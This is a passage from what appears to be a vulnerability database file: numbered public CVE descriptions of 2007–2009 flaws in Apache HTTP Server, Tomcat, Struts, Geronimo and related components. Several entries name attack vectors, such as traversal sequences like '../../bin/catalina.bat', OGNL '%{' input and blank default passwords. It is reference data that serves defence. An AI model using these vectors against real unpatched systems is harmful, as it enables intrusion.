14038| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
14039| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
14040| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
14041| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
14042| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
14043| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
14044| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
14045| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
14046| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
14047| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
14048| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
14049| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
14050| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
14051| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
14052| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
14053| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
14054| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
14055| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
14056| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
14057| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
14058| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
14059| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
14060| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
14061| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
14062| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
14063| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
14064| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
14065| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
14066| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
14067| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
14068| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
14069| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
14070| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
14071| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
14072| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
14073| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
14074| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
14075| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
14076| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
14077| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
14078| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
14079| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
14080| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
14081| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
14082| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
14083| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
14084| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
14085| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
14086| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
14087| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
14088| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
14089| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
14090| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
14091| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
14092| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
14093| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
14094| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
14095| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
14096| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
14097| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
14098| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
14099| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
14100| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
14101| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
14102| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
14103| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
14104| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
14105| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
14106| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
14107| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
14108| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
14109| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
14110| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
14111| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
14112| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
14113| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
14114| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
14115| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
14116| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
14117| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
14118| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
14119| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
14120| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
14121| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
14122| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
14123| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
14124| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
14125| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
14126| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
14127| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
14128| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
14129| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
14130| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
14131| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
14132| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
14133| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
14134| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
14135| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
14136| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
14137| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
14138| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
14139| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
14140| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
14141| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
14142| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
14143| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
14144| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
